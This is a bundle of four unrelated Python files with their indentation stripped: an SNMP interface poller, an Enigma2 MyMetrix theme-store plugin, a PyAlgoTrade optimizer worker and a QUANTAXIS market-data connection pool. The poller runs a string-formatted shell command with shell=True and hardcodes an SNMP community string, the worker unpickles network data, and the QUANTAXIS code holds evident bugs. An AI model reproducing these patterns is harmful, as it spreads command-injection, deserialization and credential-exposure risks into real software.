ooutput will be transferred to list of dictionaries,
key names are taken from output at line 3
to function properly, the MIB of the mentioned table must be present and installed,
under ubuntu use user specific diectory under ~/.snmp/mibs to store vendor specific files
every dataset - aka row of data - is prependet with key "hostname" and "ts" : timestamp of call
"""
# field should be extra separated, not the default space
cmd = ""
if index is False:
cmd = "snmptable -v2c -c %s -Cf \; %s %s" % (community, hostname, table_oid)
else:
cmd = "snmptable -v2c -c %s -Ci -Cf \; %s %s" % (community, hostname, table_oid)
logging.info(cmd)
output = subprocess.check_output((cmd, ), shell=True)
lines_to_ignore = 1 # ignore first two line
header_line = True # next is header line
headers = [] # headers are stored in list
data = [] # result
keys = {
"hostname" : hostname,
"ts" : time.time()
}
for line in output.split("\n"):
if line == "":
continue # ignore blank lines
if lines_to_ignore > 0:
lines_to_ignore -= 1
continue
else:
if header_line is True:
headers = line.strip().split(";")
header_line = False
else:
subindex = 0
values = keys.copy()
for col in line.strip().split(";"):
values[headers[subindex]] = col.replace("\"", "")
subindex += 1
data.append(values)
return data
def get_hrStorageTable(hostname, community):
data = get_snmp_table(hostname, "IF-MIB::ifTable", community, index=False)
# return only if ifConnectorPresent = "true"
data2 = [entry for entry in data if (entry["ifAdminStatus"] == "up") and (entry["ifOperStatus"] == "up") and (entry["ifType"] == "ethernetCsmacd")]
return data2
def save_data(filename, data):
"""
save data to file
input data should be a list, containing dictionaries of row data
[
{ key1 : value1,
key2 : value2,
},
{ key1 : value1,
key2 : value2,
},
]
if file already exists, the new data is appended.
if the file will be created, the firstline will be header names, sorted
all row data will be written in sorted keys ranking
"""
if len(data) > 0:
outfile = None
outfile_sema.acquire()
if not os.path.exists(filename):
outfile = open(filename, "wb")
outfile.write("\t".join(sorted(data[0].keys())))
outfile.write("\n")
else:
outfile = open(filename, "ab")
for row in data:
outfile.write("\t".join((str(row[k]) for k in sorted(row.keys()))))
outfile.write("\n")
outfile.close()
outfile_sema.release()
else:
print "No Data returned"
worklist = Queue.Queue()
outfile_sema = threading.BoundedSemaphore(value=1)
def worker():
while not worklist.empty():
hostname, community = worklist.get()
logging.info("Getting Data from %s", hostname)
try:
data = get_hrStorageTable(hostname, community)
save_data(csv_filename, data)
except subprocess.CalledProcessError as exc:
#logging.exception(exc)
logging.error("Failure to get data from %s community %s", hostname, community)
worklist.task_done()
if __name__ == "__main__":
centreon = tilak_centreon.Centreon()
project = "snmp"
tablename = "ifTable"
nagios_group = "CMDB_SERVER"
MAX_THREADS = 5
basedir = os.path.join("/var/rrd", project)
if not os.path.exists(basedir):
os.mkdir(basedir)
basedir_raw = os.path.join(basedir, "raw")
if not os.path.exists(basedir_raw):
os.mkdir(basedir_raw)
datestring = datetime.date.today().isoformat()
csv_filename = os.path.join(basedir_raw, "%s_%s.csv" % (tablename, datestring))
# get switchnames from centreon database
for row in centreon.getCentreonHostGroupMembersSnmp(nagios_group):
hostname, community, version = row
if hostname[0:2] in ("vm", ):
continue
if community is None:
community = "tango97"
worklist.put((hostname, community))
q_size = worklist.qsize()
starttime = time.time()
for i in range(MAX_THREADS):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
worklist.join()
logging.error("Duration to fetch all %s hosts %s s", q_size, time.time() - starttime)
|
metrix_Store_MetrixColors.py
|
# Embedded file name: /usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/metrix_Store_MetrixColors.py
import thread
from Plugins.Plugin import PluginDescriptor
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Screens.ChoiceBox import ChoiceBox
from twisted.web.client import downloadPage
from Screens.Console import Console
from Screens.Standby import TryQuitMainloop
from Components.MenuList import MenuList
from Components.ActionMap import ActionMap
from Components.AVSwitch import AVSwitch
from Components.config import config, configfile, ConfigYesNo, ConfigSequence, ConfigSubsection, ConfigSelectionNumber, getConfigListEntry, ConfigSelection, ConfigNumber, ConfigText, ConfigInteger
from Components.ConfigList import ConfigListScreen
from Components.Label import Label
from Components.Language import language
from uuid import getnode as get_mac
from os import environ, listdir, remove, rename, system
from skin import parseColor
from Components.Pixmap import Pixmap
from Components.Label import Label
import urllib2
import urllib
from xml.dom.minidom import parseString
import gettext
from Components.GUIComponent import GUIComponent
from Components.MenuList import MenuList
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from enigma import eListbox, RT_HALIGN_LEFT, RT_HALIGN_RIGHT
from enigma import ePicLoad, eListboxPythonMultiContent, gFont, addFont, loadPic, loadPNG
from enigma import getDesktop
from Tools.Directories import fileExists, resolveFilename, SCOPE_LANGUAGE, SCOPE_PLUGINS
import metrixColors
import metrixDefaults
import metrix_Store_SubmitRating
import threading
import time
import metrixTools
config = metrixDefaults.loadDefaults()
lang = language.getLanguage()
environ['LANGUAGE'] = lang[:2]
gettext.bindtextdomain('enigma2', resolveFilename(SCOPE_LANGUAGE))
gettext.textdomain('enigma2')
gettext.bindtextdomain('MyMetrix', '%s%s' % (resolveFilename(SCOPE_PLUGINS), 'Extensions/MyMetrix/locale/'))
def _(txt):
t = gettext.dgettext('MyMetrix', txt)
if t == txt:
t = gettext.gettext(txt)
return t
def translateBlock(block):
for x in TranslationHelper:
if block.__contains__(x[0]):
block = block.replace(x[0], x[1])
return block
class OpenScreen(Screen, ConfigListScreen):
screenWidth = getDesktop(0).size().width()
if screenWidth and screenWidth == 1920:
skin = '\n<screen name="MyMetrix-Store-Browse" position="0,0" size="1920,1080" flags="wfNoBorder" backgroundColor="transparent">\n<eLabel position="0,0" size="1920,1080" backgroundColor="transparent" zPosition="-50" />\n<eLabel position="315,center" size="620,700" backgroundColor="#40111111" zPosition="-1" />\n<eLabel position="935,center" size="614,636" backgroundColor="#40222222" zPosition="-1" />\n <eLabel font="Regular; 20" foregroundColor="#00ffffff" backgroundColor="#40000000" halign="left" position="1045,818" size="250,33" text="%s" transparent="1" />\n <widget name="menu" position="325,262" scrollbarMode="showNever" size="601,591" transparent="1" foregroundColor="#00ffffff" backgroundColor="#40000000" />\n <widget position="345,205" size="558,50" name="title" foregroundColor="#00ffffff" font="SetrixHD; 40" valign="center" transparent="1" backgroundColor="#40000000" />\n \n <eLabel position="1031,818" size="5,40" backgroundColor="#0000ff00" />\n<ePixmap pixmap="/usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/images/star.png" position="1499,722" size="32,34" zPosition="1" alphatest="blend" />\n <eLabel font="Regular; 20" foregroundColor="#00ffffff" backgroundColor="#40000000" halign="left" position="1334,818" size="200,33" text="%s" transparent="1" />\n<widget name="helperimage" position="946,363" size="591,343" zPosition="1" alphatest="blend" />\n<widget position="944,242" size="546,50" name="designname" foregroundColor="#00ffffff" font="SetrixHD; 35" valign="center" transparent="1" backgroundColor="#40000000" />\n <widget position="989,717" size="504,48" name="votes" foregroundColor="#00ffffff" font="Regular; 30" valign="center" halign="right" transparent="1" backgroundColor="#40000000" />\n<eLabel position="1320,818" zPosition="1" size="5,40" backgroundColor="#00ffff00" />\n<widget position="945,297" size="341,50" name="author" foregroundColor="#00bbbbbb" font="Regular; 28" valign="center" backgroundColor="#40000000" transparent="1" halign="left" />\n<widget position="1294,305" size="200,40" name="date" foregroundColor="#00999999" font="Regular; 25" valign="center" backgroundColor="#40000000" transparent="1" halign="right" zPosition="1" />\n\n\n </screen>\n' % (_('Install '), _('Vote'))
else:
skin = '\n<screen name="MyMetrix-Store-Browse" position="0,0" size="1280,720" flags="wfNoBorder" backgroundColor="transparent">\n<eLabel position="0,0" size="1280,720" backgroundColor="#b0ffffff" zPosition="-50" />\n<eLabel position="40,40" size="620,640" backgroundColor="#40111111" zPosition="-1" />\n<eLabel position="660,70" size="575,580" backgroundColor="#40222222" zPosition="-1" />\n <eLabel font="Regular; 20" foregroundColor="#00ffffff" backgroundColor="#40000000" halign="left" position="695,608" size="250,33" text="%s" transparent="1" />\n <widget name="menu" position="55,122" scrollbarMode="showNever" size="605,555" transparent="1" foregroundColor="#00ffffff" backgroundColor="#40000000" />\n <widget position="55,55" size="558,50" name="title" foregroundColor="#00ffffff" font="SetrixHD; 40" valign="center" transparent="1" backgroundColor="#40000000" />\n \n <eLabel position="681,610" size="5,40" backgroundColor="#0000ff00" />\n<ePixmap pixmap="/usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/images/star.png" position="1177,549" size="32,34" zPosition="1" alphatest="blend" />\n <eLabel font="Regular; 20" foregroundColor="#00ffffff" backgroundColor="#40000000" halign="left" position="1009,608" size="200,33" text="%s" transparent="1" />\n<widget name="helperimage" position="671,206" size="550,310" zPosition="1" alphatest="blend" />\n<widget position="674,82" size="546,50" name="designname" foregroundColor="#00ffffff" font="SetrixHD; 35" valign="center" transparent="1" backgroundColor="#40000000" />\n <widget position="679,542" size="491,50" name="votes" foregroundColor="#00ffffff" font="Regular; 30" valign="center" halign="right" transparent="1" backgroundColor="#40000000" />\n<eLabel position="995,610" zPosition="1" size="5,40" backgroundColor="#00ffff00" />\n<widget position="675,142" size="341,50" name="author" foregroundColor="#00bbbbbb" font="Regular; 28" valign="center" backgroundColor="#40000000" transparent="1" halign="left" />\n<widget position="1019,145" size="200,40" name="date" foregroundColor="#00999999" font="Regular; 25" valign="center" backgroundColor="#40000000" transparent="1" halign="right" zPosition="1" />\n<eLabel position="0,10" size="40,700" backgroundColor="#30000000" zPosition="-1" />\n\n </screen>\n' % (_('Install '), _('Vote'))
def __init__(self, session, args = None):
self['title'] = Label(_('OpenStore // MetrixColors'))
self.url = 'http://connect.mymetrix.de/store/api/?q=get.xml.designs'
self.screenshotpath = 'http://connect.mymetrix.de/store/api/?q=get.pngresizedColors&width=550&name='
Screen.__init__(self, session)
self.session = session
self['designname'] = Label()
self['author'] = Label()
self['votes'] = Label()
self['date'] = Label()
self.currentid = 1
self.currentgroup = 'DesignStore_'
self.Scale = AVSwitch().getFramebufferScale()
self.PicLoad = ePicLoad()
self['helperimage'] = Pixmap()
self.getCatalog = True
self.getEntry = True
self.initPicture = True
self['menu'] = SkinPartsList([])
self.menulist = []
self.menulist.append(self.DesignsListEntry('-', _('loading, please wait...'), '', '0', '0', '0'))
self['menu'].setList(self.menulist)
self['actions'] = ActionMap(['OkCancelActions',
'DirectionActions',
'InputActions',
'ColorActions'], {'up': self.keyUp,
'ok': self.selectItem,
'down': self.keyDown,
'green': self.applyDesign,
'yellow': self.openRating,
'right': self.pageDown,
'left': self.pageUp,
'cancel': self.save}, -1)
self.onLayoutFinish.append(self.startThread)
def startThread(self):
thread_getDesigns = threading.Thread(target=self.threadworker, args=())
thread_getDesigns.daemon = True
thread_getDesigns.start()
def threadworker(self):
while 1:
if self.getCatalog == True:
self.getCatalog = False
self.getDesigns()
if self.initPicture == True:
self.initPicture = False
self.UpdatePicture()
self.updateMeta()
if self.getEntry == True:
self.getEntry = False
self.updateMeta()
self.ShowPicture()
time.sleep(1)
def getDesigns(self):
try:
self.menulist = []
file = urllib2.urlopen(self.url)
data = file.read()
file.close()
dom = parseString(data)
for design in dom.getElementsByTagName('design'):
name = str(design.getAttributeNode('name').nodeValue)
title = str(design.getAttributeNode('title').nodeValue)
author = str(design.getAttributeNode('author').nodeValue)
rating = str(design.getAttributeNode('rating').nodeValue)
date = str(design.getAttributeNode('date').nodeValue)
total_votes = str(design.getAttributeNode('total_votes').nodeValue)
self.menulist.append(self.DesignsListEntry(name, title, author, rating, date, total_votes))
self['menu'].setList(self.menulist)
self.updateMeta()
self.ShowPicture()
except:
pass
def DesignsListEntry(self, name, title, author, rating, date, total_votes):
res = [[name,
title,
author,
rating,
date,
total_votes]]
png = '/usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/images/vote' + rating + '.png'
pngtype = '/usr/lib/enigma2/python/Plugins/Extensions/MyMetrix/images/brush.png'
res.append(MultiContentEntryPixmapAlphaTest(pos=(412, 9), size=(170, 32), png=loadPNG(png)))
res.append(MultiContentEntryPixmapAlphaTest(pos=(3, 7), size=(32, 32), png=loadPNG(pngtype)))
res.append(MultiContentEntryText(pos=(40, 4), size=(367, 45), font=0, text=title))
return res
def GetPicturePath(self):
try:
returnValue = str(self['menu'].l.getCurrentSelection()[0][0])
path = metrixTools.downloadFile(self.screenshotpath + returnValue)
return path
except:
pass
def updateMeta(self):
try:
self['designname'].setText(str(self['menu'].l.getCurrentSelection()[0][1]))
self['author'].setText(_('by ' + str(self['menu'].l.getCurrentSelection()[0][2])))
self['votes'].setText(str(self['menu'].l.getCurrentSelection()[0][5]))
self['date'].setText(str(self['menu'].l.getCurrentSelection()[0][4]))
self.currentid = 1
self.currentgroup = 'DesignStore_' + str(self['menu'].l.getCurrentSelection()[0][0])
except:
pass
def UpdatePicture(self):
self.PicLoad.PictureData.get().append(self.DecodePicture)
self.onLayoutFinish.append(self.ShowPicture)
def ShowPicture(self):
self.PicLoad.setPara([self['helperimage'].instance.size().width(),
self['helperimage'].instance.size().height(),
self.Scale[0],
self.Scale[1],
0,
1,
'#30000000'])
self.PicLoad.startDecode(self.GetPicturePath())
def DecodePicture(self, PicInfo = ''):
ptr = self.PicLoad.getData()
self['helperimage'].instance.setPixmap(ptr)
def UpdateComponents(self):
self.UpdatePicture()
def selectItem(self):
self.getEntry = True
def keyDown(self):
self['menu'].instance.moveSelection(self['menu'].instance.moveDown)
self.getEntry = True
def keyUp(self):
self['menu'].instance.moveSelection(self['menu'].instance.moveUp)
self.getEntry = True
def save(self):
config.plugins.MyMetrix.Color.save()
configfile.save()
self.close()
def exit(self):
self.close()
def applyDesign(self):
try:
designname = self['menu'].l.getCurrentSelection()[0][0]
file = urllib2.urlopen(self.url)
data = file.read()
file.close()
dom = parseString(data)
for design in dom.getElementsByTagName('design'):
name = str(design.getAttributeNode('name').nodeValue)
if name == designname:
try:
config.plugins.MyMetrix.Color.BackgroundTransparency.value = str(design.getAttributeNode('backgroundtrans').nodeValue)
config.plugins.MyMetrix.Color.SelectionTransparency.value = str(design.getAttributeNode('selectiontrans').nodeValue)
config.plugins.MyMetrix.Color.BackgroundTextTransparency.value = str(design.getAttributeNode('backgroundtexttrans').nodeValue)
config.plugins.MyMetrix.Color.Selection.value = str(design.getAttributeNode('selection').nodeValue)
config.plugins.MyMetrix.Color.ProgressBar.value = str(design.getAttributeNode('progressbars').nodeValue)
config.plugins.MyMetrix.Color.Background.value = str(design.getAttributeNode('background').nodeValue)
config.plugins.MyMetrix.Color.Background2.value = str(design.getAttributeNode('background2').nodeValue)
config.plugins.MyMetrix.Color.Foreground.value = str(design.getAttributeNode('foreground').nodeValue)
config.plugins.MyMetrix.Color.BackgroundText.value = str(design.getAttributeNode('backgroundtext').nodeValue)
config.plugins.MyMetrix.Color.Accent1.value = str(design.getAttributeNode('accent1').nodeValue)
config.plugins.MyMetrix.Color.Accent2.value = str(design.getAttributeNode('accent2').nodeValue)
config.plugins.MyMetrix.Color.Selection_Custom.value = self.toRGB(str(design.getAttributeNode('selection_custom').nodeValue))
config.plugins.MyMetrix.Color.Background_Custom.value = self.toRGB(str(design.getAttributeNode('background_custom').nodeValue))
config.plugins.MyMetrix.Color.Background2_Custom.value = self.toRGB(str(design.getAttributeNode('background2_custom').nodeValue))
config.plugins.MyMetrix.Color.Foreground_Custom.value = self.toRGB(str(design.getAttributeNode('foreground_custom').nodeValue))
config.plugins.MyMetrix.Color.BackgroundText_Custom.value = self.toRGB(str(design.getAttributeNode('backgroundtext_custom').nodeValue))
config.plugins.MyMetrix.Color.Accent1_Custom.value = self.toRGB(str(design.getAttributeNode('accent1_custom').nodeValue))
config.plugins.MyMetrix.Color.Accent2_Custom.value = self.toRGB(str(design.getAttributeNode('accent2_custom').nodeValue))
screenshot = str(design.getAttributeNode('screenshot').nodeValue)
self.showInfo('Design successfully downloaded!\nSave MetrixHD to apply!')
except:
self.showInfo('Design corrupt!')
except:
self.showInfo('Design corrupt!')
def openRating(self):
self.session.open(metrix_Store_SubmitRating.OpenScreen, self.currentid, self.currentgroup)
def toRGB(self, text):
rgb = []
textar = str(text.replace('[', '').replace(']', '')).split(',')
rgb.append(int(textar[0]))
rgb.append(int(textar[1]))
rgb.append(int(textar[2]))
return rgb
def showInfo(self, text = 'Information'):
self.session.open(MessageBox, _(text), MessageBox.TYPE_INFO)
def pageUp(self):
self['menu'].instance.moveSelection(self['menu'].instance.pageUp)
def pageDown(self):
self['menu'].instance.moveSelection(self['menu'].instance.pageDown)
class SkinPartsList(MenuList):
def __init__(self, list):
MenuList.__init__(self, list, False, eListboxPythonMultiContent)
self.l.setItemHeight(50)
self.l.setFont(0, gFont('SetrixHD', 26))
self.l.setFont(1, gFont('Regular', 22))
|
worker.py
|
# PyAlgoTrade
#
# Copyright 2011-2015 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import xmlrpc.client
import pickle
import time
import socket
import random
import multiprocessing
import pyalgotrade.logger
from pyalgotrade import barfeed
def call_function(function, *args, **kwargs):
return function(*args, **kwargs)
def call_and_retry_on_network_error(function, retryCount, *args, **kwargs):
ret = None
while retryCount > 0:
retryCount -= 1
try:
ret = call_function(function, *args, **kwargs)
return ret
except socket.error:
time.sleep(random.randint(1, 3))
ret = call_function(function, *args, **kwargs)
return ret
class Worker(object):
def __init__(self, address, port, workerName=None):
url = "http://%s:%s/PyAlgoTradeRPC" % (address, port)
self.__server = xmlrpc.client.ServerProxy(url, allow_none=True)
self.__logger = pyalgotrade.logger.getLogger(workerName)
if workerName is None:
self.__workerName = socket.gethostname()
else:
self.__workerName = workerName
def getLogger(self):
return self.__logger
def getInstrumentsAndBars(self):
ret = call_and_retry_on_network_error(self.__server.getInstrumentsAndBars, 10)
ret = pickle.loads(ret.data)
return ret
def getBarsFrequency(self):
ret = call_and_retry_on_network_error(self.__server.getBarsFrequency, 10)
ret = int(ret)
return ret
def getNextJob(self):
ret = call_and_retry_on_network_error(self.__server.getNextJob, 10)
ret = pickle.loads(ret.data)
return ret
def pushJobResults(self, jobId, result, parameters):
jobId = pickle.dumps(jobId)
result = pickle.dumps(result)
parameters = pickle.dumps(parameters)
workerName = pickle.dumps(self.__workerName)
call_and_retry_on_network_error(self.__server.pushJobResults, 10, jobId, result, parameters, workerName)
def __processJob(self, job, barsFreq, instruments, bars):
bestResult = None
parameters = job.getNextParameters()
bestParams = parameters
while parameters is not None:
# Wrap the bars into a feed.
feed = barfeed.OptimizerBarFeed(barsFreq, instruments, bars)
# Run the strategy.
self.getLogger().info("Running strategy with parameters %s" % (str(parameters)))
result = None
try:
result = self.runStrategy(feed, *parameters)
except Exception as e:
self.getLogger().exception("Error running strategy with parameters %s: %s" % (str(parameters), e))
self.getLogger().info("Result %s" % result)
if bestResult is None or result > bestResult:
bestResult = result
bestParams = parameters
# Run with the next set of parameters.
parameters = job.getNextParameters()
assert(bestParams is not None)
self.pushJobResults(job.getId(), bestResult, bestParams)
# Run the strategy and return the result.
def runStrategy(self, feed, parameters):
raise Exception("Not implemented")
def run(self):
try:
self.getLogger().info("Started running")
# Get the instruments and bars.
instruments, bars = self.getInstrumentsAndBars()
barsFreq = self.getBarsFrequency()
# Process jobs
job = self.getNextJob()
while job is not None:
self.__processJob(job, barsFreq, instruments, bars)
job = self.getNextJob()
self.getLogger().info("Finished running")
except Exception as e:
self.getLogger().exception("Finished running with errors: %s" % (e))
def worker_process(strategyClass, address, port, workerName):
class MyWorker(Worker):
def runStrategy(self, barFeed, *args, **kwargs):
strat = strategyClass(barFeed, *args, **kwargs)
strat.run()
return strat.getResult()
# Create a worker and run it.
w = MyWorker(address, port, workerName)
w.run()
def run(strategyClass, address, port, workerCount=None, workerName=None):
"""Executes one or more worker processes that will run a strategy with the bars and parameters supplied by the server.
:param strategyClass: The strategy class.
:param address: The address of the server.
:type address: string.
:param port: The port where the server is listening for incoming connections.
:type port: int.
:param workerCount: The number of worker processes to run. If None then as many workers as CPUs are used.
:type workerCount: int.
:param workerName: A name for the worker. A name that identifies the worker. If None, the hostname is used.
:type workerName: string.
"""
assert(workerCount is None or workerCount > 0)
if workerCount is None:
workerCount = multiprocessing.cpu_count()
workers = []
# Build the worker processes.
for i in range(workerCount):
workers.append(multiprocessing.Process(target=worker_process, args=(strategyClass, address, port, workerName)))
# Start workers
for process in workers:
process.start()
# Wait workers
for process in workers:
process.join()
|
QATdx_adv.py
|
# coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2018 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import datetime
import queue
import time
import click
from concurrent.futures import ThreadPoolExecutor
from threading import Thread, Timer
import pandas as pd
from pytdx.hq import TdxHq_API
from QUANTAXIS.QAUtil.QADate_trade import QA_util_if_tradetime
from QUANTAXIS.QAUtil.QASetting import DATABASE, stock_ip_list
from QUANTAXIS.QAUtil.QASql import QA_util_sql_mongo_sort_ASCENDING
from QUANTAXIS.QAUtil.QATransform import QA_util_to_json_from_pandas
"""
准备做一个多连接的连接池执行器Executor
当持续获取数据/批量数据的时候,可以减小服务器的压力,并且可以更快的进行并行处理
"""
class QA_Tdx_Executor():
def __init__(self, thread_num=2, timeout=1, *args, **kwargs):
self.thread_num = thread_num
self._queue = queue.Queue(maxsize=200)
self.api_no_connection = TdxHq_API()
self._api_worker = Thread(
target=self.api_worker, args=(), name='API Worker')
self._api_worker.start()
self.timeout = timeout
self.executor = ThreadPoolExecutor(self.thread_num)
def __getattr__(self, item):
try:
api = self.get_available()
func = api.__getattribute__(item)
def wrapper(*args, **kwargs):
res = self.executor.submit(func, *args, **kwargs)
self._queue.put(api)
return res
return wrapper
except:
return self.__getattr__(item)
def _queue_clean(self):
self._queue = queue.Queue(maxsize=200)
def _test_speed(self, ip, port=7709):
api = TdxHq_API(raise_exception=True, auto_retry=False)
_time = datetime.datetime.now()
# print(self.timeout)
try:
with api.connect(ip, port, time_out=1):
res = api.get_security_list(0, 1)
# print(res)
# print(len(res))
if len(api.get_security_list(0, 1)) > 800:
return (datetime.datetime.now() - _time).total_seconds()
else:
return datetime.timedelta(9, 9, 0).total_seconds()
except Exception as e:
return datetime.timedelta(9, 9, 0).total_seconds()
def get_market(self, code):
code = str(code)
if code[0] in ['5', '6', '9'] or code[:3] in ["009", "126", "110", "201", "202", "203", "204"]:
return 1
return 0
def get_frequence(self, frequence):
if frequence in ['day', 'd', 'D', 'DAY', 'Day']:
frequence = 9
elif frequence in ['w', 'W', 'Week', 'week']:
frequence = 5
elif frequence in ['month', 'M', 'm', 'Month']:
frequence = 6
elif frequence in ['Q', 'Quarter', 'q']:
frequence = 10
elif frequence in ['y', 'Y', 'year', 'Year']:
frequence = 11
elif str(frequence) in ['5', '5m', '5min', 'five']:
frequence = 0
elif str(frequence) in ['1', '1m', '1min', 'one']:
frequence = 8
elif str(frequence) in ['15', '15m', '15min', 'fifteen']:
frequence = 1
elif str(frequence) in ['30', '30m', '30min', 'half']:
frequence = 2
elif str(frequence) in ['60', '60m', '60min', '1h']:
frequence = 3
return frequence
@property
def ipsize(self):
return len(self._queue.qsize())
@property
def api(self):
return self.get_available()
def get_available(self):
if self._queue.empty() is False:
return self._queue.get_nowait()
else:
Timer(0, self.api_worker).start()
return self._queue.get()
def api_worker(self):
data = []
if self._queue.qsize() < 80:
for item in stock_ip_list:
_sec = self._test_speed(ip=item['ip'], port=item['port'])
if _sec < self.timeout*3:
try:
self._queue.put(TdxHq_API(heartbeat=False).connect(
ip=item['ip'], port=item['port'], time_out=self.timeout*2))
except:
pass
else:
self._queue_clean()
Timer(0, self.api_worker).start()
Timer(300, self.api_worker).start()
def _singal_job(self, context, id_, time_out=0.7):
try:
_api = self.get_available()
__data = context.append(self.api_no_connection.to_df(_api.get_security_quotes(
[(self._select_market_code(x), x) for x in code[80 * id_:80 * (id_ + 1)]])))
__data['datetime'] = datetime.datetime.now()
self._queue.put(_api) # 加入注销
return __data
except:
return self.singal_job(context, id_)
def get_realtime(self, code):
context = pd.DataFrame()
code = [code] if isinstance(code, str) is str else code
try:
for id_ in range(int(len(code) / 80) + 1):
context = self._singal_job(context, id_)
data = context[['datetime', 'last_close', 'code', 'open', 'high', 'low', 'price', 'cur_vol',
's_vol', 'b_vol', 'vol', 'ask1', 'ask_vol1', 'bid1', 'bid_vol1', 'ask2', 'ask_vol2',
'bid2', 'bid_vol2', 'ask3', 'ask_vol3', 'bid3', 'bid_vol3', 'ask4',
'ask_vol4', 'bid4', 'bid_vol4', 'ask5', 'ask_vol5', 'bid5', 'bid_vol5']]
data['datetime'] = data['datetime'].apply(lambda x: str(x))
return data.set_index('code', drop=False, inplace=False)
except:
return None
def get_realtime_concurrent(self, code):
code = [code] if isinstance(code, str) is str else code
try:
data = {self.get_security_quotes([(self.get_market(
x), x) for x in code[80 * pos:80 * (pos + 1)]]) for pos in range(int(len(code) / 80) + 1)}
return (pd.concat([self.api_no_connection.to_df(i.result()) for i in data]), datetime.datetime.now())
except:
pass
def get_security_bar_concurrent(self, code, _type, lens):
try:
data = {self.get_security_bars(self.get_frequence(_type), self.get_market(
str(code)), str(code), 0, lens) for code in code}
return [i.result() for i in data]
except:
raise Exception
def _get_security_bars(self, context, code, _type, lens):
try:
_api = self.get_available()
for i in range(1, int(lens / 800) + 2):
context.extend(_api.get_security_bars(self.get_frequence(
_type), self.get_market(str(code)), str(code), (i - 1) * 800, 800))
print(context)
self._queue.put(_api)
return context
except Exception as e:
return self._get_security_bars(context, code, _type, lens)
def get_security_bar(self, code, _type, lens):
code = [code] if isinstance(code, str) is str else code
context = []
try:
for item in code:
context = self._get_security_bars(context, item, _type, lens)
return context
except Exception as e:
raise e
def save_mongo(self, data, client=DATABASE):
database = DATABASE.get_collection(
'realtime_{}'.format(datetime.date.today()))
database.insert_many(QA_util_to_json_from_pandas(data))
def get_bar(timeout=1, sleep=1, thread=2):
sleep = int(sleep)
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
print(len(code))
x = QA_Tdx_Executor(timeout=float(timeout), thread_num=int(thread))
print(x._queue.qsize())
print(x.get_available())
while True:
_time = datetime.datetime.now()
if QA_util_if_tradetime(_time): # 如果在交易时间
data = x.get_security_bar_concurrent(code, 'day', 1)
print('Time {}'.format(
(datetime.datetime.now() - _time).total_seconds()))
time.sleep(sleep)
print('Connection Pool NOW LEFT {} Available IP'.format(
x._queue.qsize()))
print('Program Last Time {}'.format(
(datetime.datetime.now() - _time1).total_seconds()))
return data
else:
print('Not Trading time {}'.format(_time))
time.sleep(sleep)
def get_day_once():
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
x = QA_Tdx_Executor()
return x.get_security_bar_concurrent(code, 'day', 1)
@click.command()
@click.option('--timeout', default=0.2, help='timeout param')
@click.option('--sleep', default=1, help='sleep step')
@click.option('--thread', default=2, help='thread nums')
def bat(timeout=0.2, sleep=1, thread=2):
sleep = int(sleep)
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_block_adv
code = QA_fetch_stock_block_adv().code
print(len(code))
x = QA_Tdx_Executor(timeout=float(timeout), thread_num=int(thread))
print(x._queue.qsize())
print(x.get_available())
database = DATABASE.get_collection(
'realtime_{}'.format(datetime.date.today()))
print(database)
database.create_index([('code', QA_util_sql_mongo_sort_ASCENDING),
('datetime', QA_util_sql_mongo_sort_ASCENDING)])
while True:
_time = datetime.datetime.now()
if QA_util_if_tradetime(_time): # 如果在交易时间
data = x.get_realtime_concurrent(code)
data[0]['datetime'] = data[1]
x.save_mongo(data[0])
print('Time {}'.format(
(datetime.datetime.now() - _time).total_seconds()))
time.sleep(sleep)
print('Connection Pool NOW LEFT {} Available IP'.format(
x._queue.qsize()))
print('Program Last Time {}'.format(
(datetime.datetime.now() - _time1).total_seconds()))
else:
print('Not Trading time {}'.format(_time))
time.sleep(sleep)
if __name__ == '__main__':
import time
_time1 = datetime.datetime.now()
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_list_adv
code = QA_fetch_stock_list_adv().code.tolist()
# DATABASE.realtime.create_index([('code', QA_util_sql_mongo_sort_ASCENDING),
# ('datetime', QA_util_sql_mongo_sort_ASCENDING)])
# print(len(code))
# x = QA_Tdx_Executor()
# print(x._queue.qsize())
# print(x.get_available())
# #data = x.get_security_bars(code[0], '15min', 20)
# # print(data)
# # for i in range(5):
